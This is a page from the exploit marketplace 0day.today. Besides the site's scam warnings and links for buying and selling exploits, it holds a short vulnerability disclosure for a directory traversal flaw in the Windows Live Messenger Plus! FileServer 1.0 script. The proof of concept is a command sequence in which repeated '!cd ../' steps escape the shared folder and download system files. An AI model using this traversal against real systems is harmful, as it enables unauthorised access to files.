0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows Live Messenger Plus! FileServer 1.0 Directory Traversal Vuln
==================================================================== Windows Live Messenger Plus! FileServer 1.0 Directory Traversal Vuln ==================================================================== ########################################### Windows Live Messenger Plus! FileServer 1.0 ########################################### Found by joepie91 The FileServer script allows a user using Windows Live Messenger Plus! to share a defined folder and its subfolders and files with a contact. Authentication is done using a user-defined username and password. I have found a vulnerability in this script, which allows for downloading of EVERY file on the same disk as the defined folder ("root folder"), even outside the root folder. The script can be found at http://www.msgpluslive.nl/scripts/view/65-FileServer/ The normal procedure is to use !login to log in, !dir to list files, and !cd to select a folder. This is an example of a normal communication: > !login username password < Login succeeded. > !dir < [directory listing goes here] > !cd music < OK > !get music.mp3 < [music.mp3 is sent here] However, when using ../ with the !cd command, you can actually go beyond the root folder. This is an example communication (the root directory is C:\shared\files\): > !login username password < Login succeeded. > !cd ../ < OK > !cd ../ < OK > !cd windows < OK > !dir < [here goes a directory listing of C:\windows] > !get explorer.exe < [client sends back explorer.exe, even though it doesn't have any use] # 0day.today [2024-12-24] #